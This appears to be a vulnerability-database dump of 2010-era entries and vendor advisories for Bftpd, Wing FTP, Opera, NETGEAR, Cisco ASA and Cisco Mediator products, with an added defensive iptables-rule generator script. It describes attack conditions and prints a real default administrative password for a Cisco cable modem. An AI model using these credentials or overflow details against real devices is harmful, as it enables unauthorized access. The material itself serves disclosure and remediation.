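if __name__ == '__main__':
    for loc, cves in sorted(assess(SAMPLE_HTTPD_CONF, 'svn, version 1.6.12').items()):
        print('%-14s %s' % (loc, ', '.join(cves)))
```

Two caveats when running this against a real httpd.conf and `svn --version`. First, the two configuration-dependent issues have opposite preconditions, so no SVNPathAuthz value avoids both; the only complete fix is the update. Second, distributions that backport fixes keep the old upstream version string (the patched Red Hat packages above still report 1.6.11), so on such systems compare the package release against the vendor advisory instead of trusting the version number alone.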
VAR-201006-0502 | No CVE | Bftpd anonymous account bypass ROOTDIR security restriction vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Bftpd is a small FTP server. When bftpd handles anonymous logins, the ROOTDIR option specified in the configuration file may be ignored, allowing users to bypass the restrictions to gain read and write access to any file or directory on the system. Bftpd is prone to a security-bypass vulnerability that arises due to an access-validation error.
Exploiting this issue can allow an attacker to download or upload arbitrary files outside of the FTP server root directory. This may aid in further attacks.
The issue affects versions prior to Bftpd 2.9.
VAR-201006-0451 | CVE-2010-2428 | Windows For Wing FTP Server of Administrator Web Interface cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in admin_loginok.html in the Administrator web interface in Wing FTP Server for Windows 3.5.0 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted POST request. Wing FTP Server is a multi-protocol file server that supports HTTP and FTP. The Administrator console interface (reachable on port 5466, e.g. http://x.x.x.x:5466/admin_loginok.html) does not properly filter user-submitted requests. A remote attacker can perform a cross-site scripting attack by submitting a specially crafted POST request. Wing FTP Server is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
VAR-201007-0247 | CVE-2010-2659 | Opera Vulnerability where important information is obtained |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Opera before 10.50 on Windows, before 10.52 on Mac OS X, and before 10.60 on UNIX platforms makes widget properties accessible to third-party domains, which allows remote attackers to obtain potentially sensitive information via a crafted web site. Opera Web Browser is prone to multiple security vulnerabilities, including:
Multiple denial-of-service vulnerabilities
A security-bypass vulnerability
An information-disclosure vulnerability
An attacker can exploit these issues to cause a denial-of-service condition, gain access to sensitive information and bypass certain security restrictions. Other attacks are also possible.
Versions prior to Opera 10.60 are vulnerable. Opera supports multi-window browsing and a customizable user interface.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201206-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Opera: Multiple vulnerabilities
Date: June 15, 2012
Bugs: #264831, #283391, #290862, #293902, #294208, #294680,
#308069, #324189, #325199, #326413, #332449, #348874,
#352750, #367837, #373289, #381275, #386217, #387137,
#393395, #409857, #415379, #421075
ID: 201206-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Opera, the worst of which
allow for the execution of arbitrary code.
Background
==========
Opera is a fast web browser that is available free of charge.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-client/opera < 12.00.1467 >= 12.00.1467
Description
===========
Multiple vulnerabilities have been discovered in Opera. Please review
the CVE identifiers referenced below for details.
Impact
======
A remote attacker could entice a user to open a specially crafted web
page, possibly resulting in execution of arbitrary code with the
privileges of the process or a Denial of Service condition. A remote
attacker may be able to: trick users into downloading and executing
arbitrary files, bypass intended access restrictions, spoof trusted
content, spoof URLs, bypass the Same Origin Policy, obtain sensitive
information, force subscriptions to arbitrary feeds, bypass the popup
blocker, bypass CSS filtering, conduct cross-site scripting attacks, or
have other unknown impact.
A local attacker could perform symlink attacks to overwrite arbitrary
files with the privileges of the user running the application or
possibly obtain sensitive information.
A physically proximate attacker may be able to access an email account.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Opera users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=www-client/opera-12.00.1467"
References
==========
[ 1 ] CVE-2009-1234
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-1234
[ 2 ] CVE-2009-2059
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2059
[ 3 ] CVE-2009-2063
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2063
[ 4 ] CVE-2009-2067
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2067
[ 5 ] CVE-2009-2070
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-2070
[ 6 ] CVE-2009-3013
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3013
[ 7 ] CVE-2009-3044
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3044
[ 8 ] CVE-2009-3045
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3045
[ 9 ] CVE-2009-3046
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3046
[ 10 ] CVE-2009-3047
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3047
[ 11 ] CVE-2009-3048
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3048
[ 12 ] CVE-2009-3049
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3049
[ 13 ] CVE-2009-3831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-3831
[ 14 ] CVE-2009-4071
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4071
[ 15 ] CVE-2009-4072
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2009-4072
[ 16 ] CVE-2010-0653
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-0653
[ 17 ] CVE-2010-1349
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1349
[ 18 ] CVE-2010-1989
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1989
[ 19 ] CVE-2010-1993
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-1993
[ 20 ] CVE-2010-2121
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2121
[ 21 ] CVE-2010-2421
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2421
[ 22 ] CVE-2010-2455
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2455
[ 23 ] CVE-2010-2576
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2576
[ 24 ] CVE-2010-2658
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2658
[ 25 ] CVE-2010-2659
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2659
[ 26 ] CVE-2010-2660
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2660
[ 27 ] CVE-2010-2661
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2661
[ 28 ] CVE-2010-2662
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2662
[ 29 ] CVE-2010-2663
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2663
[ 30 ] CVE-2010-2664
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2664
[ 31 ] CVE-2010-2665
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-2665
[ 32 ] CVE-2010-3019
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3019
[ 33 ] CVE-2010-3020
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3020
[ 34 ] CVE-2010-3021
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-3021
[ 35 ] CVE-2010-4579
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4579
[ 36 ] CVE-2010-4580
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4580
[ 37 ] CVE-2010-4581
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4581
[ 38 ] CVE-2010-4582
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4582
[ 39 ] CVE-2010-4583
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4583
[ 40 ] CVE-2010-4584
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4584
[ 41 ] CVE-2010-4585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4585
[ 42 ] CVE-2010-4586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4586
[ 43 ] CVE-2011-0681
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0681
[ 44 ] CVE-2011-0682
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0682
[ 45 ] CVE-2011-0683
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0683
[ 46 ] CVE-2011-0684
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0684
[ 47 ] CVE-2011-0685
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0685
[ 48 ] CVE-2011-0686
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0686
[ 49 ] CVE-2011-0687
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0687
[ 50 ] CVE-2011-1337
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1337
[ 51 ] CVE-2011-1824
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1824
[ 52 ] CVE-2011-2609
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2609
[ 53 ] CVE-2011-2610
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2610
[ 54 ] CVE-2011-2611
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2611
[ 55 ] CVE-2011-2612
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2612
[ 56 ] CVE-2011-2613
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2613
[ 57 ] CVE-2011-2614
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2614
[ 58 ] CVE-2011-2615
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2615
[ 59 ] CVE-2011-2616
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2616
[ 60 ] CVE-2011-2617
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2617
[ 61 ] CVE-2011-2618
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2618
[ 62 ] CVE-2011-2619
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2619
[ 63 ] CVE-2011-2620
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2620
[ 64 ] CVE-2011-2621
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2621
[ 65 ] CVE-2011-2622
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2622
[ 66 ] CVE-2011-2623
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2623
[ 67 ] CVE-2011-2624
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2624
[ 68 ] CVE-2011-2625
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2625
[ 69 ] CVE-2011-2626
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2626
[ 70 ] CVE-2011-2627
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2627
[ 71 ] CVE-2011-2628
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2628
[ 72 ] CVE-2011-2629
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2629
[ 73 ] CVE-2011-2630
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2630
[ 74 ] CVE-2011-2631
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2631
[ 75 ] CVE-2011-2632
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2632
[ 76 ] CVE-2011-2633
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2633
[ 77 ] CVE-2011-2634
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2634
[ 78 ] CVE-2011-2635
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2635
[ 79 ] CVE-2011-2636
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2636
[ 80 ] CVE-2011-2637
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2637
[ 81 ] CVE-2011-2638
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2638
[ 82 ] CVE-2011-2639
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2639
[ 83 ] CVE-2011-2640
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2640
[ 84 ] CVE-2011-2641
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2641
[ 85 ] CVE-2011-3388
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3388
[ 86 ] CVE-2011-4065
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4065
[ 87 ] CVE-2011-4681
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4681
[ 88 ] CVE-2011-4682
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4682
[ 89 ] CVE-2011-4683
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4683
[ 90 ] CVE-2012-1924
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1924
[ 91 ] CVE-2012-1925
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1925
[ 92 ] CVE-2012-1926
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1926
[ 93 ] CVE-2012-1927
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1927
[ 94 ] CVE-2012-1928
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1928
[ 95 ] CVE-2012-1930
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1930
[ 96 ] CVE-2012-1931
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1931
[ 97 ] CVE-2012-3555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3555
[ 98 ] CVE-2012-3556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3556
[ 99 ] CVE-2012-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3557
[ 100 ] CVE-2012-3558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3558
[ 101 ] CVE-2012-3560
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3560
[ 102 ] CVE-2012-3561
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3561
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201206-03.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
VAR-201006-0505 | No CVE | NETGEAR WG602v4 Management Password Remote Stack Buffer Overflow Vulnerability |
CVSS V2: - CVSS V3: - Severity: - |
NETGEAR WG602v4 is a wireless router device. The authentication process in the web interface of the NETGEAR WG602v4 has a buffer overflow that an attacker can exploit to stop the device from responding. The auth_authorize() function handles this process; submitting an administrator password of more than 128 characters triggers the overflow. The NETGEAR WG602v4 is prone to a remote stack-based buffer-overflow vulnerability because the device fails to perform adequate boundary checks on user-supplied data.
Attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Failed exploit attempts will result in a denial-of-service condition.
VAR-201101-0004 | CVE-2009-5037 |
Cisco Adaptive Security Appliances devices denial of service (DoS) vulnerability
Related entries in the VARIoT exploits database: VAR-E-201005-1242 |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco Adaptive Security Appliances (ASA) 5500 series devices with software before 8.2(3) allow remote attackers to cause a denial of service (ASDM syslog outage) via a long URL, aka Bug IDs CSCsm11264 and CSCtb92911. This issue is tracked as Bug IDs CSCsm11264 and CSCtb92911. A third party may be able to cause a denial of service (DoS) by sending an overly long URL.
An attacker can exploit this issue to cause the affected device to reload, denying service to legitimate users.
This issue is documented in Cisco bug IDs CSCsm11264 and CSCtb92911.
VAR-201005-0138 | CVE-2010-2082 | Cisco Scientific Atlanta WebSTAR DPC2100R2 cable modem web interface privileged access vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The web interface on the Cisco Scientific Atlanta WebSTAR DPC2100R2 cable modem with firmware 2.0.2r1256-060303 has a default administrative password (aka SAPassword) of W2402, which makes it easier for remote attackers to obtain privileged access. The Cisco DPC2100 is a small cable modem.
VAR-201005-0064 | CVE-2010-0595 | Cisco Mediator Framework vulnerability allowing privileged access to be obtained |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
Cisco Mediator Framework 1.5.1 before 1.5.1.build.14-eng, 2.2 before 2.2.1.dev.1, and 3.0 before 3.0.9.release.1 on the Cisco Network Building Mediator NBM-2400 and NBM-4800 and the Richards-Zeta Mediator 2500 has a default password for the administrative user account and unspecified other accounts, which makes it easier for remote attackers to obtain privileged access, aka Bug ID CSCtb83495. This issue is tracked as Bug ID CSCtb83495. Access rights may be obtained by a third party. Cisco Network Building Mediator (NBM) products are affected by multiple vulnerabilities that could allow an attacker to gain control of a vulnerable device or to cause a denial of service. The Cisco Network Building Mediator is a smart, interconnected building solution that intelligently interconnects and operates heating, ventilation and cooling systems (HVAC), lighting, power, security, and renewable energy systems over IP networks. The Cisco Network Building Mediator has several security vulnerabilities, as follows:
- Default authentication credentials (CVE-2010-0595): multiple predefined users on the device, including the administrator account, use default credentials, so any user with network access to the device can log in to the control system as an administrator.
- Privilege escalation (CVE-2010-0596, CVE-2010-0597): these vulnerabilities allow an authenticated user who has neither administrator privileges nor knowledge of the administrator credentials to read and modify the device configuration. Both vulnerabilities are exploited over the HTTP or HTTPS transport protocol. In addition, the Cisco bug ID CSCtb83618 (CVE-2010-0597) vulnerability can be used to place a heavy load on the device; continuous exploitation can lead to a denial of service.
- Unauthorized information interception (CVE-2010-0598, CVE-2010-0599): sessions between the operator workstation and the Cisco Network Building Mediator are not protected against unauthorized interception. A malicious user could intercept sessions, obtain any authentication credentials used in them, and use those credentials to control the device. CVE-2010-0598 allows a malicious user to intercept HTTP sessions to obtain administrator authentication credentials; CVE-2010-0599 allows the same over XML RPC sessions.
- Unauthorized information access (CVE-2010-0600): a malicious user can read the system configuration files, which contain user account information including passwords. The attack reads the configuration files via XML RPC or XML RPC over HTTPS.
An attacker can exploit this issue to gain unauthorized administrative access to the affected device. Successful exploits will result in the complete compromise of the affected device. These vulnerabilities also affect the legacy
Richards-Zeta Mediator products. This security advisory outlines
details of the following vulnerabilities:
* Default credentials
* Privilege escalation
* Unauthorized information interception
* Unauthorized information access
Cisco has released free software updates that address these
vulnerabilities. Workarounds that mitigate some of the listed
vulnerabilities are available. All Mediator Framework software releases prior to 3.1.1 are
affected by all vulnerabilities listed in this security advisory.
This table provides information about affected software releases:
+---------------------------------------+
| Cisco Bug | Affects Software |
| ID | Releases |
|-------------+-------------------------|
| CSCtb83495 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83607 | 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83618 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83631 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83505 | 1.5.1, 2.2, 3.0.8 |
|-------------+-------------------------|
| CSCtb83512 | 1.5.1, 2.2, 3.0.8 |
+---------------------------------------+
Vulnerable Products
+------------------
Users can determine the version of the Mediator Framework running on
a device by logging into the device. After a successful login, the
device will display the version of Mediator Framework running on the
device. This ability
enables the Cisco Network Building Mediator to perform any-to-any
protocol translation and to provide information to the end user in a
uniform presentation. These vulnerabilities are independent of each other.
Default credentials
+------------------
Default credentials are assigned for several predefined user accounts
on the device including the administrative user account.
* CSCtb83495 has been assigned the CVE identifier CVE-2010-0595.
* CSCtb83607 has been assigned the CVE identifier CVE-2010-0596.
This vulnerability could enable any user to read and modify
device configuration.
* CSCtb83618 has been assigned the CVE identifier CVE-2010-0597. A malicious user
able to intercept the sessions could learn any credentials used
during intercepted sessions (for administrators and
non-administrators alike) and could subsequently take full control of
the device.
* CSCtb83631 has been assigned the CVE identifier CVE-2010-0598.
* CSCtb83505 has been assigned the CVE identifier CVE-2010-0599.
* CSCtb83512 has been assigned the CVE identifier CVE-2010-0600.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this security advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCtb83495 - Default credentials present on the system
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83607 - Privilege escalation possible over HTTP protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83618 - Privilege escalation possible over XML RPC protocol
CVSS Base Score - 9
Access Vector Network
Access Complexity Low
Authentication Single
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.4
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83631 - Possible intercept of unencrypted HTTP sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83505 - Possible intercept of unencrypted XML RPC sessions
CVSS Base Score - 9.3
Access Vector Network
Access Complexity Medium
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 7.7
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
CSCtb83512 - Access to sensitive information over XML RPC
CVSS Base Score - 10
Access Vector Network
Access Complexity Low
Authentication None
Confidentiality Impact Complete
Integrity Impact Complete
Availability Impact Complete
CVSS Temporal Score - 8.3
Exploitability Functional
Remediation Level Official Fix
Report Confidence Confirmed
Impact
======
Successful exploitation of any of these vulnerabilities could result
in a malicious user taking complete control over an affected device.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the software table below names a Mediator Framework
software release. If a given software release is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. Cisco recommends
upgrading to the latest available release where possible. All
vulnerabilities are fixed in Mediator Framework release 3.1.1 and
above. Mediator Framework release 3.1.1 is the recommended migration
path for all Mediator Framework releases.
Vulnerabilities do not affect Mediator Operating Environment.
To obtain fixed 1.5.1 and 2.2 Mediator Framework software and
configTOOL version 3.1.0b1 contact Cisco TAC.
Privilege escalation
+-------------------
There are no workarounds for these vulnerabilities.
Unauthorized information interception
+------------------------------------
The following workaround is applicable only to the vulnerability
related to the HTTP protocol. There is no workaround for the
vulnerability that affects the XML RPC service. The HTTPS service is enabled and running by
default and no further action is needed to enable it. The HTTP
service can be disabled with configTOOL. Inside the Node tree pane, expand the services tab, and
then expand the network tab. Click the http_server tab, and then
click Enabled to uncheck it.
Unauthorized information access
+------------------------------
There is no workaround for this vulnerability. In
the following examples it is assumed that the operator console has IP
address 192.0.2.1. The 192.0.2.1 address must be changed to match the
IP address used by the designated operator console. The following
code must be entered on the console. Please refer to section 2.4 in
the user guide at
http://www.cisco.com/en/US/docs/security/physical_security/cnbm/User/guide/CNBM__UG.pdf
for information on how to connect to the serial port using
hyper-terminal.
# The following rule establishes a default policy for INPUT rule chain.
# The default policy is to drop all packets unless they are explicitly
# permitted by a rule in the INPUT chain
iptables -P INPUT DROP
# This rule will allow all traffic from operator console with
# IP address of 192.0.2.1 to the Cisco NBM
#
# Change 192.0.2.1 to match IP address used by your operators console.
iptables -I INPUT 1 --source 192.0.2.1 -j ACCEPT
# Repeat the previous command if you have more than one operator console.
# Increment the number after the "INPUT" keyword for each console you
# are adding.
#
# This command will allow second operator console with IP address
# of 192.0.2.2 to access the Cisco NBM
iptables -I INPUT 2 --source 192.0.2.2 -j ACCEPT
When applying rules from the above example, care must be taken to
allow access to ports or protocols that are used by sensors and other
devices deployed in the system that are monitored and controlled by
the Cisco Network Building Mediator. Failure to do so will break
connectivity to these sensors and devices.
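The workaround above, wrapped in a small POSIX sh generator as an added example (this is not Cisco's code): it validates the operator console addresses, prints the iptables commands for review before anything is applied, and, as assumptions of my own rather than part of the advisory, adds loopback and ESTABLISHED,RELATED accepts plus optional source networks for field devices that connect in to the NBM.

```sh
#!/bin/sh
# Added example, not part of the Cisco advisory: generate the iptables INPUT
# allow-list for a Cisco NBM from a list of operator consoles, following the
# advisory's "default DROP, explicit ACCEPT per console" workaround.
#
# Beyond the advisory's two rules it adds, as assumptions a practitioner
# would normally make on an iptables host:
#   * an ACCEPT for loopback, so local services on the NBM keep working;
#   * an ACCEPT for ESTABLISHED,RELATED traffic, so replies to connections the
#     NBM itself opens towards sensors are not dropped (assumes the device's
#     iptables supports the "state" match);
#   * optional source networks for field devices that connect in to the NBM
#     (the advisory only warns that these must be allowed).
# The ACCEPT rules are emitted before the DROP policy so there is no moment at
# which every console is locked out; the advisory lists them the other way
# round.  By default the commands are printed for review, not executed.

# is_ipv4 ADDR: succeed only for a dotted quad with every octet in 0..255.
is_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    oldifs=$IFS; IFS=.
    set -- $1
    IFS=$oldifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# is_ipv4_or_cidr ADDR[/PREFIX]: accept a host address or a network in CIDR form.
is_ipv4_or_cidr() {
    case "$1" in
        */*)
            prefix=${1#*/}
            case "$prefix" in ''|*[!0-9]*) return 1 ;; esac
            [ "$prefix" -le 32 ] && is_ipv4 "${1%/*}" ;;
        *)  is_ipv4 "$1" ;;
    esac
}

# nbm_input_rules "CONSOLE_IP ..." ["DEVICE_NET ..."]
# Print one iptables command per line.  Arguments are space-separated lists;
# everything is validated before the first line is printed, so a typo cannot
# leave the chain half configured.
nbm_input_rules() {
    consoles=$1
    devices=${2:-}
    [ -n "$consoles" ] || { echo "at least one operator console is required" >&2; return 1; }
    for c in $consoles; do
        is_ipv4 "$c" || { echo "invalid operator console address: $c" >&2; return 1; }
    done
    for d in $devices; do
        is_ipv4_or_cidr "$d" || { echo "invalid device network: $d" >&2; return 1; }
    done

    n=1
    echo "iptables -I INPUT $n -i lo -j ACCEPT"; n=$((n + 1))
    echo "iptables -I INPUT $n -m state --state ESTABLISHED,RELATED -j ACCEPT"; n=$((n + 1))
    # One rule per operator console, exactly as in the advisory.
    for c in $consoles; do
        echo "iptables -I INPUT $n --source $c -j ACCEPT"; n=$((n + 1))
    done
    # Field devices that initiate connections to the NBM.  Narrow these with
    # -p/--dport once the protocols in use are known.
    for d in $devices; do
        echo "iptables -I INPUT $n --source $d -j ACCEPT"; n=$((n + 1))
    done
    # Only now switch the default policy to DROP.
    echo "iptables -P INPUT DROP"
}

# Usage:  sh nbm_rules.sh            -> dry run with the constructed sample below
#         sh nbm_rules.sh --apply "192.0.2.1 192.0.2.2" "198.51.100.0/24"
#                                    -> execute the rules (root on the NBM console)
if [ "${1:-}" = "--apply" ]; then
    shift
    nbm_input_rules "$@" | while IFS= read -r cmd; do
        sh -c "$cmd"
    done
else
    # Constructed sample input: the advisory's two consoles plus one device subnet.
    nbm_input_rules "192.0.2.1 192.0.2.2" "198.51.100.0/24"
fi
```

Review the printed rules on the serial console first; with `--apply` each line is executed in order, and nothing is executed if any address fails validation.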
Additional mitigation techniques that can be deployed on Cisco
devices within the network are available in the Cisco Applied
Mitigation Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20100526-mediator.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
